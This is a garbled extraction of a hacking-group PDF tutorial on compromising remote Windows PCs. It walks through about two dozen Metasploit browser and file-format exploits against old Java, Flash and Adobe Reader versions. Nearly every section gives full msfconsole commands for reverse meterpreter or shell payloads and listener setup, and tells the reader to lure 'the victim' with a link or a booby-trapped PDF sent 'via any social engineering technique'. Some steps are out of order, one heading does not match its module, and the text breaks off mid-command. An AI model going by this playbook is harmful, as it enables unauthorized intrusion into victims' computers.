back track tutorials
DESCRIPTION
How to Attack on Remote PC With Applications VulnerabilitiesTRANSCRIPT
[Type text] Page 1
IriIriISIrIsT.Ir Page 1
Back Track Tutorials
How to Attack on Remote PC With Applications Vulnerabilities
By : Red H4t V!per
© All Right Reserved For IrIsT Security Team
[Type text] Page 2
IriIriISIrIsT.Ir Page 1
B
Contact :
© Copy Right :
All Right Reserved For IrIsT Security Team - Behnam Abbasi
Vanda
Spacial Tnx To :
Am!r , C0dex , B3HZ4D , TaK.FaNaR , 0x0ptim0us , Mr.XHat
Skote_Vahshat , (^_^)
Gr33TZ To : IrIsT , TBH , 3xp1r3 , KurdHackTeam
[Type text] Page 3
IriIriISIrIsT.Ir Page 1
Introduction :
In this paper an attempt is made on how to exploiting
vulnerabilities and geting access from remote pc with
metasploit on back track .
Its is assumed that you're familiar enough with the Linux
operating system and the metasploit software .
So we go straight to Attack Topic.
Thanks all Dears for reading this article
[Type text] Page 4
IriIriISIrIsT.Ir Page 1
Attacting on Remote Windows PC using java Signed Applet Methodacked :
This exploit dynamically creates a .jar file via the Msf:: Exploit::Java mixin, then signs the
it. The resulting signed applet is presented to the victim via a web page with an applet
tag. The victim’s JVM will pop a dialog asking if they trust the signed applet. On older
versions the dialog will display the value of CERTCN in the “Publisher” line. Newer JVMs
display “UNKNOWN” when the signature is not trusted (i.e., it’s not signed by a trusted
CA). The SigningCert option allows you to provide a trusted code signing cert, the values
in which will override CERTCN. If SigningCert is not given, a randomly generated self-
signed cert will be used. Either way, once the user clicks “run”, the applet executes with
full user permissions.
Open backtrack terminal type msfconsole then type below command:
use exploit/multi/browser/java_signed_applet
Now type Show options :
Msf exploit (Java_signed-applet)>Set payload windows/meterpreter/reverse_tcp
Msf exploit (Java_signed-applet)>Set appletname adobe (The main applet’s class name)
Msf exploit (Java_signed-applet)>Set certcn adobe player (value for the certificate)
Msf exploit (Java_signed-applet)>Set srvhost 192.168.42.131 (This must be an address on the
local machine)
Msf exploit (Java_signed-applet)>Set srvport 80 (The local port to listen on default: 8080)
Msf exploit (Java_signed-applet)>Set uripath adobeclipes (The Url to use for this exploit)
Msf exploit (Java_signed-applet)>Set lport 4443
Msf exploit (Java_signed-applet)>exploit
Now an URL you should give to your victim http:// 192.168.42.131 / adobeclipes
Send the link of the server to the victim via any social engineering technique.
When the victim open that link in their browser You get access to the victims PC.
Use “Sessions -l” and the Session number to connect to the session
[Type text] Page 5
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows PC using Sun Java Command Line Injection :
This module exploits a flaw in the Web Start component of the Sun Java Runtime
Environment. The arguments passed to Java Web Start are not properly validated,
allowing injection of arbitrary arguments to the JVM. By utilizing the lesser known
-J option, an attacker can take advantage of the -XXaltjvm option, as discussed
previously by Ruben Santamarta. This method allows an attacker to execute
arbitrary code in the context of an unsuspecting browser user. In order for this
module to work, it must be run as root on a server that does not serve SMB.
Additionally, the target host must have the Web Client service (WebDAV Mini-
Redirector) enabled
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/browser/java_ws_vmargs
Msf exploit (java_ws_vmargs)>set payload windows/meterpreter/reverse_tcp
Msf exploit (java_ws_vmargs)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (java_ws_vmargs)>set srvhost 192.168.42.131 (This must be an address on the
local machine)
Msf exploit (java_ws_vmargs)>set srvport 80
Msf exploit (java_ws_vmargs)>set uripath / (The Url to use for this exploit)
Msf exploit (java_ws_vmargs)>exploit
Now an URL you should give to your victim http:// 192.168.42.131/
Send the link of the server to the victim via any social engineering technique.
When the victim open that link in their browser You get access to the victims PC.
Use “Sessions -l” and the Session number to connect to the session
[Type text] Page 6
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows PC using Java Atomic Reference Array Type Violation
Vulnerability :
This module exploits vulnerability due to the fact that AtomicReferenceArray uses
the unsafe class to store a reference in an array directly, which may violate type
safety if not used properly. This allows a way to escape the JRE sandbox, and load
additional classes in order to perform malicious operations.
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/browser/java_atomicreferencearray
Msf exploit (java_atomicreferencearray)>set payload generic/shell_reverse_tcp
Msf exploit (java_atomicreferencearray)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (java_atomicreferencearray)>set srvhost 192.168.42.131 (This must be an
address on the local machine)
Msf exploit (java_atomicreferencearray)>set uripath yes (The Url to use for this exploit)
Msf exploit (java_atomicreferencearray)>exploit
Now an URL you should give to your victim http:// 192.168.42.131 :8080/ yes
Send the link of the server to the victim via any social engineering technique.
When the victim open that link in their browser You get access to the victims PC.
Use “Sessions -l” and the Session number to connect to the session
[Type text] Page 7
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows PC using java Trusted Chain Method :
This module exploits vulnerability in Java Runtime Environment that allows an
untrusted method to run in a privileged context. The vulnerability affects version
6 prior to update 19 and version 5 prior to update 23.
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/browser/java_trusted_chain
Msf exploit (java_trusted_chain)>set payload java/meterpreter/reverse_tcp
Msf exploit (java_trusted_chain)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (java_trusted_chain)>set srvhost 192.168.42.131 (This must be an address on
the local machine)
Msf exploit (java_trusted_chain)>set uripath jta (The Url to use for this exploit)
Msf exploit (java_trusted_chain)>exploit
Now an URL you should give to your victim http:// 192.168.42.131 :8080/jta
Send the link of the server to the victim via any social engineering technique.
When the victim open that link in their browser You get access to the victims PC.
Use “Sessions -l” and the Session number to connect to the session
[Type text] Page 8
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows PC using Java RMIConnectionImpl Deserialization
Privilege Escalation Exploit :
This module exploits vulnerability in the Java Runtime Environment that allows to
deserialize a Marshalled Object containing a custom class loader under a
privileged context. The vulnerability affects version 6 prior to update 19 and
version 5 prior to update 23.
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/browser/java_rmi_connection_impl
Msf exploit (java_rmi_connection_impl)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (java_rmi_connection_impl)>set srvhost 192.168.42.131 (This must be an
address on the local machine)
Msf exploit (java_rmi_connection_impl)>set uripath bip (The Url to use for this exploit)
Msf exploit (java_rmi_connection_impl)>exploit
Now an URL you should give to your victim http:// 192.168.42.131 :8080/bip
Send the link of the server to the victim via any social engineering technique.
When the victim open that link in their browser You get access to the victims PC.
Use “Sessions -l” and the Session number to connect to the session
[Type text] Page 9
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows PC using Sun Java Runtime Buffer Overflow :
This module exploits a flaw in the new plugin component of the Sun Java Runtime
Environment before v6 Update 22. By specifying specific parameters to the new
plugin, an attacker can cause a stack-based buffer overflow and execute arbitrary
code. When the new plugin is invoked with a “launchjnlp” parameter, it will copy
the contents of the “docbase” parameter to a stack-buffer using the “sprintf”
function. A string of 396 bytes is enough to overflow the 256 byte stack buffer
and overwrite some local variables as well as the saved return address. NOTE: The
string being copied is first passed through the “WideCharToMultiByte”. Due to
this, only characters which have a valid localized multibyte representation are
allowed. Invalid characters will be replaced with question marks (‘?’).
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/browser/java_docbase_bof
Msf exploit (java_docbase_bof)>set payload
windows/meterpreter/reverse_tcp
Msf exploit (java_docbase_bof)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (java_docbase_bof)>set srvhost 192.168.42.131 (This must be
an address on the local machine)
Msf exploit (java_docbase_bof)>set uripath jab (The Url to use for this
exploit)
Msf exploit (java_docbase_bof)>exploit
Now an URL you should give to your victim http:// 192.168.42.131 :8080/jab
Send the link of the server to the victim via any social engineering technique.
When the victim open that link in their browser You get access to the victims PC.
Use “Sessions -l” and the Session number to connect to the session
[Type text] Page 10
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows PC using Sun Java Applet2ClassLoader Remote
Code Execution ::
This module exploits vulnerability in the Java Runtime Environment that allows an
attacker to run an applet outside of the Java Sandbox. When an applet is invoked
with: 1. A “codebase” parameter that points at a trusted directory 2. A “code”
parameter that is a URL that does not contain any dots the applet will run outside
of the sandbox. This vulnerability affects JRE prior to version 6 update 24.
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/browser/java_codebase_trust
Msf exploit (java_codebase_trust)>set payload java/meterpreter/reverse_tcp
Msf exploit (java_codebase_trust)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (java_codebase_trust)>set srvhost 192.168.42.131 (This must be an address on
the local machine)
Msf exploit (java_codebase_trust)>set uripath jt (The Url to use for this exploit)
Msf exploit (java_codebase_trust)>exploit
Now an URL you should give to your victim http:// 192.168.42.131 :8080/jt
Send the link of the server to the victim via any social engineering technique.
When the victim open that link in their browser You get access to the victims PC.
Use “Sessions -l” and the Session number to connect to the session
[Type text] Page 11
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows PC using Sun Java Web start Execution:
This module exploits vulnerability in Java Runtime Environment that allows an
attacker to escape the Java Sandbox. By injecting a parameter into a java’s call
within the Basic Service Impl class the default java sandbox policy file can be
therefore overwritten. The vulnerability affects version 6 prior to update 22.
NOTE: Exploiting this vulnerability causes several sinister-looking popup windows
saying that Java is “Downloading application.”
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/browser/java_basicservice_impl
Msf exploit ((java_basicservice_impl)>set payload windows/meterpreter/reverse_tcp
Msf exploit (java_basicservice_impl) set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (java_basicservice_impl)>set srvhost 192.168.42.131 (This must be an
address on the local machine)
Msf exploit (java_basicservice_impl)>set uripath jbs (The Url to use for this exploit)
Msf exploit (java_basicservice_impl)>exploit
Now an URL you should give to your victim http:// 192.168.42.131 :8080/jbs
Send the link of the server to the victim via any social engineering technique.
When the victim open that link in their browser You get access to the victims PC.
Use “Sessions -l” and the Session number to connect to the session
[Type text] Page 12
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows PC using java Applet Rhino Script :
This module exploits vulnerability in the Rhino Script Engine that can be used by a
Java Applet to run arbitrary Java code outside of the sandbox. The vulnerability
affects version 7 and version 6 update 27 and earlier, and should work on any
browser that supports Java (for example: IE, Firefox, Google Chrome, etc)
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/browser/java_rhino
Msf exploit (java_rhino)>set srvhost 192.168.42.131 (This must be an address on the local
machine)
Msf exploit (java_rhino)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (java_rhino)>set target 1 (Opreating system of Victim PC)
Msf exploit (java_rhino)>set uripath jr (The Url to use for this exploit)
Msf exploit (java_rhino)>exploit
Now an URL you should give to your victim http:// 192.168.42.131 :8080/jr
Send the link of the server to the victim via any social engineering technique.
When the victim open that link in their browser You get access to the victims PC.
Use “Sessions -l” and the Session number to connect to the session
[Type text] Page 13
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows PC using Java MixerSequencer Object GM_Song
Structure Handling Vulnerability :
This module exploits a flaw within the handling of MixerSequencer objects in Java
6u18 and before. Exploitation id done by supplying a specially crafted MIDI file
within an RMF File. When the MixerSequencer objects is used to play the file, the
GM Song structure is populated with a function pointer provided by a SONG block
in the RMF. A Midi block that contains a MIDI with a specially crafted controller
event is used to trigger the vulnerability. When triggering the vulnerability “ebx”
points to a fake event in the MIDI file which stores the shell code. A “jmp ebx”
from msvcr71.dll is used to make the exploit reliable over java updates.
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/browser/java_mixer_sequencer
Msf exploit (java_mixer_sequencer)>set payload
windows/meterpreter/reverse_tcp
Msf exploit (java_mixer_sequencer) set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (java_mixer_sequencer)>set srvhost 192.168.42.131 (This must be an
address on the local machine)
Msf exploit (java_mixer_sequencer)>set uripath jm (The Url to use for this exploit)
Msf exploit (java_mixer_sequencer)>exploit
Now an URL you should give to your victim http:// 192.168.42.131 :8080/jm
Send the link of the server to the victim via any social engineering technique.
When the victim open that link in their browser You get access to the victims PC.
Use “Sessions -l” and the Session number to connect to the session
[Type text] Page 14
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows PC using Sun Java Calendar Deserialization
Privilege Escalation :
This module exploits a flaw in the deserialization of Calendar objects in the Sun
JVM. The payload can be either a native payload which is generated as an
executable and dropped/executed on the target or a shell from within the Java
applet in the target browser. The affected Java versions are JDK and JRE 6 Update
10 and earlier, JDK and JRE 5.0 Update 16 and earlier, SDK and JRE 1.4.2_18 and
earlier (SDK and JRE 1.3.1 are not affected).
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/browser/java_calendar_deserialize
Now an URL you should give to your victim http:// 192.168.42.131 :8080/jc
Send the link of the server to the victim via any social engineering technique.
When the victim open that link in their browser You get access to the victims PC.
Use “Sessions -l” and the Session number to connect to the session
Msf exploit (java_calendar_deserialize)>set payload java/meterpreter/reverse_tcp
Msf exploit (java_calendar_deserialize)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (java_calendar_deserialize)>set srvhost 192.168.42.131 (This must be an
address on the local machine)
Msf exploit (java_calendar_deserialize)>set uripath jc (The Url to use for this exploit)
Msf exploit (java_calendar_deserialize)>exploit
[Type text] Page 15
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows PC using Sun Java JRE get Sound bank file :
This module exploits a flaw in the getSoundbank function in the Sun JVM. The payload is serialized and
passed to the applet via PARAM tags. It must be a native payload. The effected
Java versions are JDK and JRE 6 Update 16 and earlier, JDK and JRE 5.0 Update 21
and earlier, SDK and JRE 1.4.2_23 and earlier, and SDK and JRE 1.3.1_26 and
earlier. NOTE: Although all of the above versions are reportedly vulnerable, only
1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.
Open backtrack terminal type msfconsole then type below command:
use exploit/multi/browser/java_getsoundbank_bof
Msf exploit (java_getsoundbank_bof)>set payload generic/shell_reverse_tcp
Msf exploit (java_getsoundbank_bof)>set lhost 192.168.42.131 (IP of Local
Host)
Msf exploit (java_getsoundbank_bof)>set uripath js (The Url to use for this
exploit)
Msf exploit (java_getsoundbank_bof)>exploit
Now an URL you should give to your victim http:// 192.168.42.131 :8080/jc
Send the link of the server to the victim via any social engineering technique.
When the victim open that link in their browser You get access to the victims PC.
Use “Sessions -l” and the Session number to connect to the session
[Type text] Page 16
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows PC using Sun Java JRE AWT setDiffICM Buffer
Overflow :
This module exploits a flaw in the setDiffICM function in the Sun JVM. The
payload is serialized and passed to the applet via PARAM tags. It must be a native
payload. The effected Java versions are JDK and JRE 6 Update 16 and earlier, JDK
and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and earlier, and SDK and
JRE 1.3.1_26 and earlier. NOTE: Although all of the above versions are reportedly
vulnerable, only 1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/browser/java_setdifficm_bof
Msf exploit (java_setdifficm_bof)>set payload generic/shell_reverse_tcp
Msf exploit (java_setdifficm_bof)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (java_setdifficm_bof)>set srvhost 192.168.42.131 (This must be an address on
the local machine)
Msf exploit (java_setdifficm_bof)>set uripath rb (The Url to use for this exploit)
Msf exploit (java_setdifficm_bof)>exploit
Now an URL you should give to your victim http:// 192.168.42.131 :8080/rb
Send the link of the server to the victim via any social engineering technique.
When the victim open that link in their browser You get access to the victims PC.
Use “Sessions -l” and the Session number to connect to the session
[Type text] Page 17
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows PC using Sun Java Web Start Plugin Command Line
Argument Injection :
This module exploits a flaw in the Web Start Plugin component of Sun Java Web
Start. The arguments passed to Java Web Start are not properly validated. By
passing the lesser known -J option, an attacker can pass arbitrary options directly
to the Java runtime. By utilizing the -XXaltjvm option, as discussed by Ruben
Santamarta, an attacker can execute arbitrary code in the context of an
unsuspecting browser user. This vulnerability was originally discovered
independently by both Ruben Santamarta and Tavis Ormandy. Tavis reported that
all versions since version 6 Update 10 “are believed to be affected by this
vulnerability.” In order for this module to work, it must be run as root on a server
that does not serve SMB. Additionally, the target host must have the Web Client
service (WebDAV Mini-Redirector) enabled.
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/browser/java_ws_arginject_altjvm
Msf exploit (java_ws_arginject_altjvm)>set payload windows/meterpreter/reverse_tcp
Msf exploit (java_ws_arginject_altjvm)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (java_ws_arginject_altjvm)>set srvhost 192.168.42.131 (This must be an
address on the local machine)
Msf exploit (java_ws_arginject_altjvm)>exploit
Now an URL you should give to your victim http:// 192.168.42.131/
Send the link of the server to the victim via any social engineering technique.
When the victim open that link in their browser You get access to the victims PC.
Use “Sessions -l” and the Session number to connect to the session
[Type text] Page 18
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows PC usingJava Applet JAX-WS Remote Code
Execution :
This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java
code outside of the sandbox as exploited in the wild in November of 2012. The
vulnerability affects Java version 7u7 and earlier.
Open backtrack terminal type msfconsole then type below command:
use exploit/multi/browser/java_jre17_jaxws
msf exploit (java_jre17_jaxws)>set payload java/shell_reverse_tcp
msf exploit (java_jre17_jaxws)>set lhost 192.168.42.131 (IP of Local Host)
msf exploit (java_jre17_jaxws)>set srvhost 192.168.42.131 (This must be an address on
the local machine)
msf exploit (java_jre17_jaxws)>set uripath / (The Url to use for this exploit)
msf exploit (java_jre17_jaxws)>exploit
Now an URL you should give to your victim http:// 192.168.42.131 :8080/
Send the link of the server to the victim via any social engineering technique.
When the victim open that link in their browser You get access to the victims PC.
Use “Sessions -l” and the Session number to connect to the session
[Type text] Page 19
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows PC using Java 7 Applet Remote Code Execution :
The exploit takes advantage of two issues in JDK 7: The Class Finder and Method
Finder.find Method(). Both were newly introduced in JDK 7. Class Finder is a
replacement for class For Name back in JDK 6. It allows untrusted code to obtain a
reference and have access to a restricted package in JDK 7, which can be used to
abuse sun.awt. Sun Toolkit (a restricted package). With sun.awt. Sun Toolkit, we
can actually invoke get Field() by abusing find Method() in
Statement.invokeInternal() (but get Field() must be public, and that’s not always
the case in JDK 6) in order to access Statement.acc’s private field, modify Access
Control Context, and then disable Security Manager. Once Security Manager is
disabled, we can execute arbitrary Java code. Our exploit has been tested
successfully against multiple platforms, including: IE, Firefox, Safari, Chrome;
Windows, Ubuntu, OS X, Solaris, etc.
Open backtrack terminal type msfconsole then type below command:
use exploit/multi/browser/java_jre17_exec
msf exploit (java_jre17_exec)>set payload java/shell_reverse_tcp
msf exploit (java_jre17_exec)>set lhost 192.168.42.131 (IP of Local Host)
msf exploit (java_jre17_exec)>set srvhost 192.168.42.131 (This must be an address on
the local machine)
msf exploit (java_jre17_exec)>set uripath / (The Url to use for this exploit)
msf exploit (java_jre17_exec)>exploit
Now an URL you should give to your victim http:// 192.168.42.131 :8080/
Send the link of the server to the victim via any social engineering technique. When the victim
open that link in their browser You get access to the victims PC. Use “Sessions -l” and the
Session number to connect to the session
[Type text] Page 20
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows PC using Java Applet Field Bytecode Verifier Cache
Remote Code Execution :
This module exploits vulnerability in HotSpot bytecode verifier where an invalid
optimization of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to
insufficient type checks. This allows a way to escape the JRE sandbox, and load
additional classes in order to perform malicious operations
Open backtrack terminal type msfconsole then type below command:
use exploit/multi/windows/browser/java_verifier_field_access
Msf exploit (java_verifier_field_access)>set payload java/shell_reverse_tcp
Msf exploit (java_verifier_field_access)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (java_verifier_field_access)>set srvhost 192.168.42.131 (This must be an
address on the local machine)
Msf exploit (java_verifier_field_access)>set uripath / (The Url to use for this exploit)
Msf exploit (java_verifier_field_access)>exploit
Now an URL you should give to your victim http:// 192.168.42.131 :8080/
Send the link of the server to the victim via any social engineering technique.
When the victim open that link in their browser You get access to the victims PC.
Use “Sessions -l” and the Session number to connect to the session
[Type text] Page 21
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows PC using Java Applet Field Bytecode Verifier Cache
Remote Code Execution :
This module exploits a vulnerability found in the ActiveX component of Adobe
Flash Player before 11.3.300.271. By supplying a corrupt Font file used by the
SWF, it is possible to gain arbitrary remote code execution under the context of
the user, as exploited in the wild.
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/browser/adobe_flash_otf_font
msf exploit (adobe_flash_otf_font)>set lhost 192.168.42.131 (IP of Local Host)
msf exploit (adobe_flash_otf_font)>set srvhost 192.168.42.131 (This must be an
address on the local machine)
msf exploit (adobe_flash_otf_font)>set uripath flu (The Url to use for this exploit)
msf exploit (adobe_flash_otf_font)>exploit
Now an URL you should give to your victim http:// 192.168.42.131 :8080/flu
Send the link of the server to the victim via any social engineering technique.
When the victim open that link in their browser You get access to the victims PC.
Use “Sessions -l” and the Session number to connect to the session
[Type text] Page 22
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows PC using Adobe Flash Player 11.3 Font Parsing
Code Execution :
This module exploits a vulnerability found in the ActiveX component of Adobe
Flash Player before 11.3.300.271. By supplying a corrupt Font file used by the
SWF, it is possible to gain arbitrary remote code execution under the context of
the user, as exploited in the wild.
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/browser/adobe_flash_otf_font
Now an URL you should give to your victim http:// 192.168.42.131 :8080/fpu
Send the link of the server to the victim via any social engineering technique.
When the victim open that link in their browser You get access to the victims PC.
Use “Sessions -l” and the Session number to connect to the session
msf exploit (adobe_flash_otf_font)>set payload windows/meterpreter/reverse_tcp
msf exploit (adobe_flash_otf_font)>set lhost 192.168.42.131 (IP of Local Host)
msf exploit (adobe_flash_otf_font)>set srvhost 192.168.42.131 (This must be an
address on the local machine)
msf exploit (adobe_flash_otf_font)>set uripath fpu (The Url to use for this exploit)
msf exploit (adobe_flash_otf_font)>exploit
[Type text] Page 23
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows PC using Adobe Flash Player Object Type
Confusion :
This module exploits a vulnerability found in Adobe Flash Player. By supplying a
corrupt AMF0 “_error” response, it is possible to gain arbitrary remote code
execution under the context of the user. This vulnerability has been exploited in
the wild as part of the “World Uyghur Congress Invitation.doc” e-mail attack.
According to the advisory, 10.3.183.19 and 11.x before 11.2.202.235 are affected.
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/browser/adobe_flash_rtmp
Msf exploit (adobe_flash_rtmp)>set payload windows/meterpreter/reverse_tcp
Msf exploit (adobe_flash_rtmp)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (adobe_flash_rtmp)>set srvhost 192.168.42.131 (This must be an address on
the local machine)
Msf exploit (adobe_flash_rtmp)>set uripath / (The Url to use for this exploit)
Msf exploit (adobe_flash_rtmp)>exploit
Now an URL you should give to your victim http:// 192.168.42.131 :8080/
Send the link of the server to the victim via any social engineering technique.
When the victim open that link in their browser You get access to the victims PC.
Use “Sessions -l” and the Session number to connect to the session
[Type text] Page 24
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows PC using Adobe util.printf() Buffer Overflow :
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat
Professional < 8.1.3. By creating a specially crafted pdf that a contains malformed
util.printf() entry, an attacker may be able to execute arbitrary code.
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/fileformat/adobe_utilprintf
After we successfully generate the malicious PDF File, it will stored on your local computer
/root/.msf4/local/book.pdf
Now we need to set up a listener to handle reverse connection sent by victim when the exploit
successfully executed.
Now send your book.pdf files to victim, as soon as they download and open it. Now you can
access meterpreter shell on victim computer. Use “Sessions -l” and the Session number to
connect to the session.
Msf exploit (adobe_utilprintf)>set payload windows/meterpreter/reverse_tcp
Msf exploit (adobe_utilprintf)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (adobe_utilprintf)>set filename book.pdf
Msf exploit (adobe_utilprintf)>exploit
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit
[Type text] Page 25
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows PC using Adobe Doc.media.newPlayer Use After
Free Vulnerability :
This module exploits a use after free vulnerability in Adobe Reader and Adobe
Acrobat Professional versions up to and including 9.2.
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/browser/adobe_media_newplayer
Msf exploit (adobe_media_newplayer)>set payload windows/meterpreter/reverse_tcp
Msf exploit (adobe_media_newplayer)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (adobe_media_newplayer)>set srvhost 192.168.42.131 (This must be an
address on the local machine)
Msf exploit (adobe_media_newplayer)>set uripath ad (The Url to use for this exploit)
Msf exploit (adobe_media_newplayer)>exploit
Now an URL you should give to your victim http:// 192.168.42.131 :8080/ad
Send the link of the server to the victim via any social engineering technique.
When the victim open that link in their browser You get access to the victims PC.
Use “Sessions -l” and the Session number to connect to the session
[Type text] Page 26
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows PC using Adobe Reader U3D Memory Corruption
Vulnerability :
This module exploits vulnerability in the U3D handling within versions 9.x through
9.4.6 and 10 through to 10.1.1 of Adobe Reader. The vulnerability is due to the
use of uninitialized memory. Arbitrary code execution is achieved by embedding
specially crafted U3D data into a PDF document. A heap spray via JavaScript is
used in order to ensure that the memory used by the invalid pointer issue is
controlled.
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/fileformat/adobe_reader_u3d
Msf exploit (adobe_reader_u3d)>set payload windows/meterpreter/reverse_tcp
Msf exploit (adobe_reader_u3d)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (adobe_reader_u3d)>set filename learning.pdf
Msf exploit (adobe_reader_u3d)>exploit
After we successfully generate the malicious PDF File, it will stored on your local computer
/root/.msf4/local/learning.pdf
Now we need to set up a listener to handle reverse connection sent by victim when the exploit
successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit
[Type text] Page 27
IriIriISIrIsT.Ir Page 1
Now send your learning.pdf files to victim, as soon as they download and open it. Now you can
access meterpreter shell on victim computer. Use “Sessions -l” and the Session number to
connect to the session.
Attacting On Remote Windows PC using Adobe PDF Escape EXE Social
Engineering:
This module embeds a Metasploit payload into an existing PDF file in a non-
standard method. The resulting PDF can be sent to a target as part of a social
engineering attack.
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
Msf exploit (adobe_pdf_embedded_exe_nojs)>set payload windows/meterpreter/reverse_tcp
Msf exploit (adobe_pdf_embedded_exe_nojs)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (adobe_pdf_embedded_exe_nojs)>set filename parse.pdf
Msf exploit (adobe_pdf_embedded_exe_nojs)>exploit
After we successfully generate the malicious PDF File, it will stored on your local computer
/root/.msf4/local/parse.pdf
Now we need to set up a listener to handle reverse connection sent by victim when the exploit
successfully executed.
Use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit
[Type text] Page 28
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows PC Using Adobe Acrobat Bundled LibTIFF Integer
Overflow :
This module exploits integer overflow vulnerability in Adobe Reader and Adobe
Acrobat Professional versions 8.0 through 8.2 and 9.0 through 9.3.
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/fileformat/adobe_libtiff
After we successfully generate the malicious PDF File, it will stored on your local computer
/root/.msf4/local/ebook.pdf
Now we need to set up a listener to handle reverse connection sent by victim when the exploit
successfully executed.
Now send your parse.pdf files to victim, as soon as they download and open it. Now you
can access meterpreter shell on victim computer. Use “Sessions -l” and the Session number
to connect to the session
Msf exploit (adobe_libtiff)>set payload windows/meterpreter/reverse_tcp
Msf exploit (adobe_libtiff)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (adobe_libtiff)>set filename ebook.pdf
Msf exploit (adobe_libtiff)>exploit
[Type text] Page 29
IriIriISIrIsT.Ir Page 1
Now send your ebook.pdf files to victim, as soon as they download and open it. Now you can
access meterpreter shell on victim computer. Use “Sessions -l” and the Session number to
connect to the session
Attacting On Remote Windows PC Using Adobe Collab.collect Email Info() Buffer
Overflow :
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat
Professional 8.1.1. By creating a specially crafted pdf that a contains malformed
Collab.collectEmailInfo () call, an attacker may be able to execute arbitrary code
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/fileformat/adobe_collectemailinfo
Msf exploit (adobe_collectemailinfo)>set payload windows/meterpreter/reverse_tcp
Msf exploit (adobe_collectemailinfo)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (adobe_collectemailinfo)>set filename math.pdf
Msf exploit (adobe_collectemailinfo)>exploit
After we successfully generate the malicious PDF File, it will stored on your local computer
/root/.msf4/local/math.pdf
Now we need to set up a listener to handle reverse connection sent by victim when the exploit
successfully executed.
Use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit
[Type text] Page 30
IriIriISIrIsT.Ir Page 1
Now send your math.pdf files to victim, as soon as they download and open it. Now you can
access meterpreter shell on victim computer. Use “Sessions -l” and the Session number to
connect to the session
Attacting On Remote Windows PC Using Adobe CoolType SING Table
“uniqueName” Stack Buffer Overflow :
This module exploits vulnerability in the Smart Independent Glyplets (SING) table
handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior version is
assumed to be vulnerable as well.
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/browser/adobe_cooltype_sing
Msf exploit (adobe_cooltype_sing)>set payload windows/meterpreter/reverse_tcp
Msf exploit (adobe_cooltype_sing)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (adobe_cooltype_sing)>set srvhost 192.168.42.131 (This must be an address
